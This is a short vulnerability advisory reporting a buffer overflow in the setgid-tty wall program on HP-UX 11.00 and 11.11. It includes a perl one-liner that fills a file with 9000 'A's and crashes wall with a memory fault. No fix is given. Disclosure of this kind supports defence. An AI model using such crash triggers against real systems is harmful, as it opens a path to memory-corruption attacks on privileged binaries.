COMMAND

    Wall Buffer Overflow

SYSTEMS AFFECTED

    Tested on HPUX 11.00, 11.11

PROBLEM

    eip,c0w of uk2sec [uk2sec@oakey.no-ip.com] says :

    bash-2.04$ ls -las /usr/sbin/wall
    40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997 /usr/sbin/wall

    Wall on HPUX works in the following way:

    echo "Something to Say" > file
    wall file

    The problem arises when we place 9000 A's into the file to be
    broadcast by the wall program.

    Example :
    =========

    perl -e 'print "A" x 9000' > /tmp/out
    /usr/sbin/wall /tmp/out
    Memory fault

    The wall binary has Set Group ID of tty, so not a huge problem,
    but even so - still a security risk.

SOLUTION

    ?